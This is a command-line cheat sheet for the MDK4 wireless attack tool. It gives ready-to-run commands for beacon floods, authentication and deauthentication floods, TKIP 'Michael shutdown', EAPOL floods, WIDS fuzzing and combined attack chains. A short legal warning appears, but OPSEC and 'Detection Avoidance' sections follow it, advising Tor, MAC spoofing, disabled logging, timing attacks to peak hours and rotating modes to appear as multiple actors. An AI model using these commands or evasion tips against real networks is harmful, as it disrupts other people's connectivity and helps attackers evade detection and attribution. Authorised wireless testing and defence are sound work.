MDK4
Installation
Section intitulée « Installation »# Install dependencies (Ubuntu/Debian)
sudo apt-get install build-essential libpcap-dev aircrack-ng
# Clone and compile MDK4
git clone https://github.com/aircrack-ng/mdk4.git
cd mdk4
make
sudo make install
# Verify installation
mdk4 --versionMonitor Mode Setup
Section intitulée « Monitor Mode Setup »# Check wireless interfaces
iwconfig
ip link show
# Enable monitor mode on wlan0
sudo airmon-ng start wlan0
# Or manually with iw (creates wlan0mon)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Verify monitor mode active
iwconfig
# Output should show "Mode:Monitor"
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Or manually revert
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 upBasic Usage
Section intitulée « Basic Usage »# Help and version info
mdk4 --help
mdk4 --version
# List available attack modes
mdk4 wlan0mon --help
# General syntax
mdk4 <interface> <attack_mode> [options] <target>Attack Modes
Section intitulée « Attack Modes »Beacon Flood (b)
Section intitulée « Beacon Flood (b) »Flood network with fake beacons, creating ghost networks and confusing clients.
# Basic beacon flood on all channels
mdk4 wlan0mon b
# Beacon flood with custom SSID file
mdk4 wlan0mon b -f ssid_list.txt
# Flood specific channel
mdk4 wlan0mon b -c 6
# Flood multiple channels
mdk4 wlan0mon b -c 1,6,11
# Set beacon interval (milliseconds)
mdk4 wlan0mon b -i 100
# Specify output interface (if multiple)
mdk4 wlan0mon b -B wlan0monAuthentication DoS (a)
Section intitulée « Authentication DoS (a) »Flood target with authentication requests, exhausting AP resources.
# Basic authentication DoS
mdk4 wlan0mon a -t <target_BSSID>
# Auth DoS on specific channel
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -c 6
# Flood with custom auth rate (packets/sec)
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -n 100
# Target multiple APs
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66SSID Probing (p)
Section intitulée « SSID Probing (p) »Broadcast probe requests for networks in a wordlist, testing for hidden SSIDs.
# Probe with SSID list
mdk4 wlan0mon p -f wordlist.txt
# Probe specific SSID
mdk4 wlan0mon p -s "MyNetwork"
# Probe on single channel
mdk4 wlan0mon p -f wordlist.txt -c 6
# Specify probe interval (milliseconds)
mdk4 wlan0mon p -f wordlist.txt -i 50Deauthentication/Disassociation (d)
Section intitulée « Deauthentication/Disassociation (d) »Force clients to disconnect from target AP.
# Deauth all clients on target AP
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF
# Deauth specific client
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Deauth with custom frame count
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100
# Deauth on specific channel
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -C 6Michael Shutdown (m)
Section intitulée « Michael Shutdown (m) »Trigger Michael frame errors to disable TKIP encryption and force downgrade.
# Basic Michael shutdown
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF
# Michael attack on specific client
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Set attack rate
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -n 100EAPOL Start (e)
Section intitulée « EAPOL Start (e) »Send EAPOL Start frames to initiate authentication handshakes.
# Basic EAPOL Start flood
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF
# EAPOL with custom source MAC
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -s 00:11:22:33:44:55
# Set EAPOL interval
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -i 50WIDS/IPS Evasion (w)
Section intitulée « WIDS/IPS Evasion (w) »Exploit WIDS (Wireless Intrusion Detection) by sending fuzzy/malformed frames.
# WIDS confusion mode
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF
# Fuzzy frame generation
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF --fuzzy
# Target specific WIDS sensor
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF -c 6Targeting and Filtering
Section intitulée « Targeting and Filtering »# Target specific AP by BSSID
mdk4 wlan0mon b -t AA:BB:CC:DD:EE:FF
# Target specific client MAC
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Exclude specific BSSID
mdk4 wlan0mon b --bssid-file exclude.txt
# Target by SSID name (if known)
mdk4 wlan0mon d -s "TargetNetwork"
# Multiple targets
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66 -t 99:88:77:66:55:44Channel Selection and Frequency
Section intitulée « Channel Selection and Frequency »# Single channel
mdk4 wlan0mon b -c 6
# Multiple channels
mdk4 wlan0mon b -c 1,6,11,36,40,44,48
# All 2.4GHz channels
mdk4 wlan0mon b -c 1-13
# 5GHz UNII bands
mdk4 wlan0mon b -c 36-165
# No channel restriction (all bands)
mdk4 wlan0mon bRate Control and Timing
Section intitulée « Rate Control and Timing »# Set frame rate (packets per second)
mdk4 wlan0mon b -n 1000
# Millisecond interval between frames
mdk4 wlan0mon b -i 10
# Slow rate for OPSEC
mdk4 wlan0mon b -n 50 -i 100
# Aggressive rate
mdk4 wlan0mon b -n 5000 -i 1MAC Spoofing and Source Control
Section intitulée « MAC Spoofing and Source Control »# Custom source MAC for beacons
mdk4 wlan0mon b -s 00:11:22:33:44:55
# Random MAC per frame
mdk4 wlan0mon b --random-mac
# Fixed BSSID in beacons
mdk4 wlan0mon b -B AA:BB:CC:DD:EE:FFAdvanced Options
Section intitulée « Advanced Options »# Verbose output
mdk4 wlan0mon b -v
# Show packet details
mdk4 wlan0mon b -d
# Duration/time limit (seconds)
timeout 300 mdk4 wlan0mon b
# Output to file for analysis
mdk4 wlan0mon b -o attack.log
# Background execution
mdk4 wlan0mon b &OPSEC and Legal Considerations
Section intitulée « OPSEC and Legal Considerations »Legal Warning
Section intitulée « Legal Warning »MDK4 performs DoS attacks against wireless networks. Only use on networks you own or have explicit written permission to test. Unauthorized use violates:
- Computer Fraud and Abuse Act (CFAA) in US
- Computer Misuse Act in UK
- Similar laws in most jurisdictions
Operational Security
Section intitulée « Operational Security »# Use VPN/Tor if testing remote networks (never your home IP)
# Spoof MAC address to avoid tracking
sudo macchanger -r wlan0mon
# Use minimal output to reduce detection
mdk4 wlan0mon b -c 6 > /dev/null
# Disable logging of attacks
mdk4 wlan0mon b --nolog
# Time attacks during high traffic periods
# Launch during peak hours (less suspicious)
# Exit cleanly and restore interface
sudo airmon-ng stop wlan0mon
sudo systemctl restart networkingDetection Avoidance
Section intitulée « Detection Avoidance »- Vary attack parameters (channels, rates, timing)
- Avoid flooding from single source MAC
- Rotate attack modes to appear as multiple actors
- Do not target production networks during business hours
- Leave adequate gaps between attacks
- Monitor for WIDS alerts during testing
Combined Attack Scenarios
Section intitulée « Combined Attack Scenarios »# Multi-channel beacon flood with custom SSIDs
mdk4 wlan0mon b -f wordlist.txt -c 1-13 -n 500
# Deauth + beacon flood (run in parallel)
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
mdk4 wlan0mon b -c 6 &
wait
# SSID enumeration + probe analysis
mdk4 wlan0mon p -f wordlist.txt -v
# Michael shutdown before deauth
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF &
sleep 5
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
waitTroubleshooting
Section intitulée « Troubleshooting »| Issue | Solution |
|---|---|
| ”wlan0mon: No such device” | Run sudo airmon-ng start wlan0 to create monitor interface |
| Attacks fail silently | Check iwconfig for Monitor mode, verify channel, try -v flag |
| High CPU usage | Reduce rate (-n) or interval (-i) values |
| Packets not sending | Disable software encryption: sudo rfkill unblock all |
| Cannot target specific AP | Verify BSSID with sudo airodump-ng wlan0mon first |
| Connection to WIDS/IPS | Use fuzzy mode (w --fuzzy) or vary channels/rates |
Related Tools
Section intitulée « Related Tools »- aircrack-ng — Full WiFi security suite (airodump, aireplay, airmon)
- hashcat — Password cracking for captured handshakes
- Wireshark — Packet analysis and inspection
- hcxdumptool — Extract hash-mode 22000 from PCAP for hashcat
- hostapd — Create rogue AP for evil twin attacks